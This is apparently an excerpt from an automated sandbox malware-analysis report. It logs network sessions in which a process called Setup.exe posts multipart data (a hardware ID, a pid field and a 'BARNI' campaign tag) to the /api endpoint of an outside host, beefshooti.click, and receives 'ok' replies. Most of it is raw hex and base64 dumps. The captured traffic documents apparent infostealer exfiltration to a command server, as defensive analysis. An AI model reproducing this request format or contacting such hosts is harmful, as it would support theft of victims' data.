                                                                                                                    Data Ascii: KAJ2PMg8A8nzr+LPoDDF21C3k+nKVPBuEfHJZNhcI68vEyPsgDmBjLRoKQ+gIsAKlqaTaZvB4uwUs0miSg5wLSnHtb/KuQaL8OqiTWAzR5hSdZNryRQx/kOiSyDYWaOla8fwPEv/Qs7h7LLKs/MEyQbmkmhJFvLtUDNJpszMcm8rQfF+CbxFijMooMhg8UNYVHICuRvWNP5GIkdnDEuzfmVGtTkKvsRYNjjnHOIx188A9xFoyxQyrBMxC6SJD/I
                                                                                                                    2024-12-24 00:12:19 UTC1369INData Raw: 58 78 4f 72 59 43 62 74 37 74 67 6a 2f 50 6b 31 39 6e 52 4e 6c 4c 6f 43 5a 54 78 4c 35 45 32 79 47 63 4d 7a 2f 50 73 4b 6b 41 31 2f 38 73 2f 42 77 70 79 71 47 49 4e 49 6a 45 47 69 51 4e 6d 6b 32 79 62 77 65 4c 6d 45 33 43 4a 38 42 37 66 74 48 31 76 55 7a 51 2f 6d 47 75 58 53 44 4e 71 49 38 2b 6a 4d 51 63 64 6b 4c 63 57 4b 6f 69 56 64 6d 7a 53 38 77 6d 6c 69 77 39 79 4c 32 76 41 4d 58 37 49 66 55 57 59 49 6e 74 67 69 76 50 6b 31 39 48 56 4d 78 41 72 53 4e 4a 77 4c 68 44 33 79 61 4c 59 58 43 4f 71 71 4d 64 6c 36 6f 33 35 67 6f 6e 32 4f 4f 63 63 34 6a 48 58 7a 77 44 33 45 4f 73 4b 46 6e 46 71 30 58 50 4a 4a 51 6f 4e 38 71 7a 70 77 7a 54 39 69 62 7a 48 69 7a 4d 71 6f 59 38 69 38 49 52 62 55 79 61 42 4f 6f 6f 52 34 76 68 41 4f 67 77 6d 43 30 7a 6a 71 54 71 46
                                                                                                                    Data Ascii: XxOrYCbt7tgj/Pk19nRNlLoCZTxL5E2yGcMz/PsKkA1/8s/BwpyqGINIjEGiQNmk2ybweLmE3CJ8B7ftH1vUzQ/mGuXSDNqI8+jMQcdkLcWKoiVdmzS8wmliw9yL2vAMX7IfUWYIntgivPk19HVMxArSNJwLhD3yaLYXCOqqMdl6o35gon2OOcc4jHXzwD3EOsKFnFq0XPJJQoN8qzpwzT9ibzHizMqoY8i8IRbUyaBOooR4vhAOgwmC0zjqTqF
                                                                                                                    2024-12-24 00:12:19 UTC269INData Raw: 32 47 6a 69 48 39 63 55 54 68 4e 30 61 59 31 57 59 66 36 6b 68 55 63 79 76 41 4e 59 55 31 57 45 2f 6a 75 4f 64 46 5a 66 6b 59 61 35 50 62 6f 65 2f 78 57 76 50 6a 42 78 32 55 64 78 4a 76 43 77 59 39 59 64 6e 33 79 47 63 4d 54 6e 5a 74 4f 52 43 6c 2f 31 68 72 69 52 67 7a 71 71 65 49 70 6e 47 44 32 4d 44 35 51 54 71 4e 78 2b 54 2b 58 58 4b 4a 5a 55 6d 4b 4e 2f 32 67 78 72 64 39 54 48 78 43 69 2b 48 34 38 55 31 7a 35 4e 4d 4b 67 50 65 57 2b 70 33 44 35 6e 69 46 5a 70 38 79 33 4d 68 67 4b 4c 6b 47 70 65 71 63 37 68 64 4d 6f 66 31 78 58 53 4d 32 51 31 69 51 4d 78 4a 37 52 46 68 37 4b 4e 4e 7a 7a 79 4b 48 77 44 4a 6f 61 6b 4b 77 4f 4e 74 34 78 34 75 79 61 71 54 63 38 47 4c 45 43 51 62 34 77 72 69 62 32 43 46 2b 56 69 4a 63 39 73 55 50 63 43 31 6f 78 72 47 76 77
                                                                                                                    Data Ascii: 2GjiH9cUThN0aY1WYf6khUcyvANYU1WE/juOdFZfkYa5Pboe/xWvPjBx2UdxJvCwY9Ydn3yGcMTnZtORCl/1hriRgzqqeIpnGD2MD5QTqNx+T+XXKJZUmKN/2gxrd9THxCi+H48U1z5NMKgPeW+p3D5niFZp8y3MhgKLkGpeqc7hdMof1xXSM2Q1iQMxJ7RFh7KNNzzyKHwDJoakKwONt4x4uyaqTc8GLECQb4wrib2CF+ViJc9sUPcC1oxrGvw
                                                                                                                    2024-12-24 00:12:19 UTC1369INData Raw: 33 31 65 65 0d 0a 31 66 50 42 4f 55 43 71 34 2b 48 35 50 70 45 70 4a 2b 79 48 5a 75 6e 4b 54 71 46 5a 66 6b 59 61 35 50 62 6f 65 2f 78 57 76 50 6a 42 78 32 55 64 78 4a 76 43 77 59 39 59 64 75 7a 69 32 65 4a 69 36 4d 6c 61 38 59 30 4c 4a 76 74 68 4a 67 6e 35 54 46 65 38 2f 30 55 53 52 62 6d 68 4c 71 47 6c 7a 46 74 30 66 66 4f 74 59 50 4f 63 69 2b 6f 78 79 56 33 43 72 69 47 6d 43 4a 37 59 4e 7a 31 35 74 52 4a 45 66 4c 43 76 4a 2f 44 5a 44 73 45 35 35 37 79 54 35 77 31 2f 75 79 54 49 2b 67 62 37 59 50 59 4a 2f 74 77 6a 43 64 32 52 6c 6e 56 64 6b 4e 6c 42 46 63 33 62 52 50 77 69 71 6c 48 78 44 44 75 71 63 43 6c 63 4d 33 2b 77 30 6a 77 71 71 37 44 59 48 4d 43 32 4e 4e 33 45 72 71 59 52 2f 45 2b 52 6a 77 61 39 4e 68 41 59 44 37 76 45 79 50 73 68 54 31 45 79 37
                                                                                                                    Data Ascii: 31ee1fPBOUCq4+H5PpEpJ+yHZunKTqFZfkYa5Pboe/xWvPjBx2UdxJvCwY9Yduzi2eJi6Mla8Y0LJvthJgn5TFe8/0USRbmhLqGlzFt0ffOtYPOci+oxyV3CriGmCJ7YNz15tRJEfLCvJ/DZDsE557yT5w1/uyTI+gb7YPYJ/twjCd2RlnVdkNlBFc3bRPwiqlHxDDuqcClcM3+w0jwqq7DYHMC2NN3ErqYR/E+Rjwa9NhAYD7vEyPshT1Ey7
                                                                                                                    2024-12-24 00:12:19 UTC1369INData Raw: 35 6d 4c 52 7a 59 4e 6d 6c 6a 71 64 78 2b 4d 75 6c 4c 62 4c 5a 67 33 50 59 6d 46 6d 69 76 5a 39 53 44 67 44 53 33 4c 6a 49 59 69 68 66 55 68 63 55 44 55 52 4b 30 35 54 6f 76 33 41 4d 5a 72 77 78 68 2b 68 76 75 62 51 70 66 71 59 61 35 64 46 63 53 6a 69 7a 53 5a 32 6c 4a 44 54 64 31 4c 76 44 39 53 78 35 68 44 32 43 48 62 62 33 37 49 2b 2f 78 65 6d 62 49 6c 35 31 31 34 6c 2f 2f 65 5a 74 79 63 54 7a 5a 63 6c 46 50 71 4f 52 2b 54 36 77 36 4a 4f 64 74 35 66 6f 6d 34 74 68 37 52 38 54 66 31 57 68 37 35 69 4a 49 77 6e 38 30 63 57 6e 33 78 52 71 77 6f 52 63 79 2f 5a 75 6c 72 31 57 45 78 6a 75 4f 64 54 4a 2b 79 48 72 68 64 4f 49 66 31 78 51 61 4d 78 52 46 6a 56 63 73 48 6a 7a 68 63 32 37 39 44 69 57 58 62 4a 33 36 57 36 2b 70 4d 30 2b 4e 68 72 6b 31 79 6e 50 6a 57
                                                                                                                    Data Ascii: 5mLRzYNmljqdx+MulLbLZg3PYmFmivZ9SDgDS3LjIYihfUhcUDURK05Tov3AMZrwxh+hvubQpfqYa5dFcSjizSZ2lJDTd1LvD9Sx5hD2CHbb37I+/xembIl5114l//eZtycTzZclFPqOR+T6w6JOdt5fom4th7R8Tf1Wh75iJIwn80cWn3xRqwoRcy/Zulr1WExjuOdTJ+yHrhdOIf1xQaMxRFjVcsHjzhc279DiWXbJ36W6+pM0+Nhrk1ynPjW


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    2192.168.2.449732104.21.18.1854436596C:\Users\user\Desktop\Setup.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-24 00:12:20 UTC274OUTPOST /api HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Content-Type: multipart/form-data; boundary=GBWXKW47DF
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                    Content-Length: 18115
                                                                                                                    Host: beefshooti.click
                                                                                                                    2024-12-24 00:12:20 UTC15331OUTData Raw: 2d 2d 47 42 57 58 4b 57 34 37 44 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 36 45 43 43 32 43 39 41 41 38 46 34 45 38 46 33 30 33 43 37 35 37 41 41 37 31 41 41 38 35 32 0d 0a 2d 2d 47 42 57 58 4b 57 34 37 44 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 47 42 57 58 4b 57 34 37 44 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 42 41 52 4e 49 0d 0a 2d 2d 47 42 57 58 4b 57 34 37 44 46 0d 0a 43 6f 6e 74 65 6e 74 2d
                                                                                                                    Data Ascii: --GBWXKW47DFContent-Disposition: form-data; name="hwid"26ECC2C9AA8F4E8F303C757AA71AA852--GBWXKW47DFContent-Disposition: form-data; name="pid"2--GBWXKW47DFContent-Disposition: form-data; name="lid"jMw1IE--BARNI--GBWXKW47DFContent-
                                                                                                                    2024-12-24 00:12:20 UTC2784OUTData Raw: c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88 8d cc 54 77 94 6d 93 be 93 15 d7 52 9c ab a6 b6 5f
                                                                                                                    Data Ascii: .\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECaTwmR_
                                                                                                                    2024-12-24 00:12:22 UTC1126INHTTP/1.1 200 OK
                                                                                                                    Date: Tue, 24 Dec 2024 00:12:22 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Set-Cookie: PHPSESSID=e8v9v7n9e0s9nqqjd3bnoeavpf; expires=Fri, 18 Apr 2025 17:59:00 GMT; Max-Age=9999999; path=/
                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    X-Frame-Options: DENY
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                    vary: accept-encoding
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nVXwFJ7sssx7J0u5x%2F0wZZJ6qCQJKpC2lF0reWPxK1WAOwyrLsieIUDo5Ko0eheMpIWOlgvx6MFNtonqNl%2FZ5vgTztackQu51E3rOShwoarXFEfR5%2BRQsuHcC4Jb5afQg8Wn"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 8f6c61182f5c7271-EWR
                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1842&min_rtt=1832&rtt_var=707&sent=13&recv=22&lost=0&retrans=0&sent_bytes=2841&recv_bytes=19069&delivery_rate=1524804&cwnd=225&unsent_bytes=0&cid=2acc5ed8f643fefc&ts=1298&x=0"
                                                                                                                    2024-12-24 00:12:22 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                    Data Ascii: fok 8.46.123.189
                                                                                                                    2024-12-24 00:12:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    3192.168.2.449734104.21.18.1854436596C:\Users\user\Desktop\Setup.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-24 00:12:23 UTC275OUTPOST /api HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Content-Type: multipart/form-data; boundary=H7H31ZUGFVXU
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                    Content-Length: 8748
                                                                                                                    Host: beefshooti.click
                                                                                                                    2024-12-24 00:12:23 UTC8748OUTData Raw: 2d 2d 48 37 48 33 31 5a 55 47 46 56 58 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 36 45 43 43 32 43 39 41 41 38 46 34 45 38 46 33 30 33 43 37 35 37 41 41 37 31 41 41 38 35 32 0d 0a 2d 2d 48 37 48 33 31 5a 55 47 46 56 58 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 48 37 48 33 31 5a 55 47 46 56 58 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 42 41 52 4e 49 0d 0a 2d 2d 48 37 48 33 31 5a 55 47 46 56 58 55 0d 0a
                                                                                                                    Data Ascii: --H7H31ZUGFVXUContent-Disposition: form-data; name="hwid"26ECC2C9AA8F4E8F303C757AA71AA852--H7H31ZUGFVXUContent-Disposition: form-data; name="pid"2--H7H31ZUGFVXUContent-Disposition: form-data; name="lid"jMw1IE--BARNI--H7H31ZUGFVXU
                                                                                                                    2024-12-24 00:12:24 UTC1121INHTTP/1.1 200 OK
                                                                                                                    Date: Tue, 24 Dec 2024 00:12:24 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Set-Cookie: PHPSESSID=6k7jcbepugfqpu1il9oqlft9d2; expires=Fri, 18 Apr 2025 17:59:03 GMT; Max-Age=9999999; path=/
                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    X-Frame-Options: DENY
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                    vary: accept-encoding
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=16snQzysTMZPYhBbNkFIynHsUI6hLN0JjGz5aAnoJ%2F98mlGOjA9uH6QcYdpgVluuXnd0XKpg7xxgK8KYnYqS8mdXM1V3J4Rr%2FIsY3tyNqwzFH0zrGKxaKlEXWq6NW5k8Uhsd"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 8f6c61292b027c78-EWR
                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=2010&min_rtt=2000&rtt_var=757&sent=8&recv=14&lost=0&retrans=0&sent_bytes=2842&recv_bytes=9681&delivery_rate=1460000&cwnd=252&unsent_bytes=0&cid=63a0c63881371a70&ts=875&x=0"
                                                                                                                    2024-12-24 00:12:24 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                    Data Ascii: fok 8.46.123.189
                                                                                                                    2024-12-24 00:12:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    4192.168.2.449738104.21.18.1854436596C:\Users\user\Desktop\Setup.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-24 00:12:26 UTC276OUTPOST /api HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Content-Type: multipart/form-data; boundary=B5HRORPDBHHC
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                    Content-Length: 20401
                                                                                                                    Host: beefshooti.click
                                                                                                                    2024-12-24 00:12:26 UTC15331OUTData Raw: 2d 2d 42 35 48 52 4f 52 50 44 42 48 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 36 45 43 43 32 43 39 41 41 38 46 34 45 38 46 33 30 33 43 37 35 37 41 41 37 31 41 41 38 35 32 0d 0a 2d 2d 42 35 48 52 4f 52 50 44 42 48 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 42 35 48 52 4f 52 50 44 42 48 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 42 41 52 4e 49 0d 0a 2d 2d 42 35 48 52 4f 52 50 44 42 48 48 43 0d 0a
                                                                                                                    Data Ascii: --B5HRORPDBHHCContent-Disposition: form-data; name="hwid"26ECC2C9AA8F4E8F303C757AA71AA852--B5HRORPDBHHCContent-Disposition: form-data; name="pid"3--B5HRORPDBHHCContent-Disposition: form-data; name="lid"jMw1IE--BARNI--B5HRORPDBHHC
                                                                                                                    2024-12-24 00:12:26 UTC5070OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                    Data Ascii: lrQMn 64F6(X&7~`aO
                                                                                                                    2024-12-24 00:12:27 UTC1127INHTTP/1.1 200 OK
                                                                                                                    Date: Tue, 24 Dec 2024 00:12:27 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Set-Cookie: PHPSESSID=42ge5ul3r235mphihhdhbrf31s; expires=Fri, 18 Apr 2025 17:59:06 GMT; Max-Age=9999999; path=/
                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    X-Frame-Options: DENY
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                    vary: accept-encoding
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CxsNsX%2BhyvTw8ob8wzwHlUPtd8YAJsczlXkT1mDX9h3cbbpPA1KjBgpnkpRMC3c%2F3WRtnYQy5WJYDwJvwfraNLr6FRNL51e%2FuSkxfoXaYFAE06iVNJE9deloeMWE%2Bemt3Hpf"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 8f6c613a591e0c76-EWR
                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1481&min_rtt=1474&rtt_var=567&sent=14&recv=24&lost=0&retrans=0&sent_bytes=2841&recv_bytes=21357&delivery_rate=1907250&cwnd=151&unsent_bytes=0&cid=257318e2d81dc9b0&ts=995&x=0"
                                                                                                                    2024-12-24 00:12:27 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                    Data Ascii: fok 8.46.123.189
                                                                                                                    2024-12-24 00:12:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    5192.168.2.449740104.21.18.1854436596C:\Users\user\Desktop\Setup.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-24 00:12:29 UTC277OUTPOST /api HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Content-Type: multipart/form-data; boundary=2M7NPPXJMWSGOF
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                    Content-Length: 1231
                                                                                                                    Host: beefshooti.click
                                                                                                                    2024-12-24 00:12:29 UTC1231OUTData Raw: 2d 2d 32 4d 37 4e 50 50 58 4a 4d 57 53 47 4f 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 36 45 43 43 32 43 39 41 41 38 46 34 45 38 46 33 30 33 43 37 35 37 41 41 37 31 41 41 38 35 32 0d 0a 2d 2d 32 4d 37 4e 50 50 58 4a 4d 57 53 47 4f 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 32 4d 37 4e 50 50 58 4a 4d 57 53 47 4f 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 42 41 52 4e 49 0d 0a 2d 2d 32 4d 37 4e 50 50 58 4a
                                                                                                                    Data Ascii: --2M7NPPXJMWSGOFContent-Disposition: form-data; name="hwid"26ECC2C9AA8F4E8F303C757AA71AA852--2M7NPPXJMWSGOFContent-Disposition: form-data; name="pid"1--2M7NPPXJMWSGOFContent-Disposition: form-data; name="lid"jMw1IE--BARNI--2M7NPPXJ
                                                                                                                    2024-12-24 00:12:30 UTC1125INHTTP/1.1 200 OK
                                                                                                                    Date: Tue, 24 Dec 2024 00:12:30 GMT
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Set-Cookie: PHPSESSID=ibc1na03mhm5t1d63ucju6p3n7; expires=Fri, 18 Apr 2025 17:59:08 GMT; Max-Age=9999999; path=/
                                                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    X-Frame-Options: DENY
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                    vary: accept-encoding
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HvuBcWLK0o3r9ZV2vR%2BzxvugGBPuPjTqV63ijisRtU3Bwm8f4ORvMaI1APtlHtDCU%2FDD8SbmVQ8bjXfJlGhwBtpNpd6RnVPdgXsEwxc1p0Ck3fJq4%2B9TmPl%2BsTfCLxCKWCYA"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 8f6c614d7c0b7d16-EWR
                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=13013&min_rtt=5678&rtt_var=7072&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2841&recv_bytes=2144&delivery_rate=514265&cwnd=217&unsent_bytes=0&cid=e6f77b4548b81c61&ts=815&x=0"
                                                                                                                    2024-12-24 00:12:30 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                    Data Ascii: fok 8.46.123.189
                                                                                                                    2024-12-24 00:12:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    6192.168.2.449742104.21.18.1854436596C:\Users\user\Desktop\Setup.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-24 00:12:31 UTC272OUTPOST /api HTTP/1.1
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Content-Type: multipart/form-data; boundary=O72ZSG6XG
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                    Content-Length: 1064
                                                                                                                    Host: beefshooti.click
                                                                                                                    2024-12-24 00:12:31 UTC1064OUTData Raw: 2d 2d 4f 37 32 5a 53 47 36 58 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 36 45 43 43 32 43 39 41 41 38 46 34 45 38 46 33 30 33 43 37 35 37 41 41 37 31 41 41 38 35 32 0d 0a 2d 2d 4f 37 32 5a 53 47 36 58 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4f 37 32 5a 53 47 36 58 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 42 41 52 4e 49 0d 0a 2d 2d 4f 37 32 5a 53 47 36 58 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70
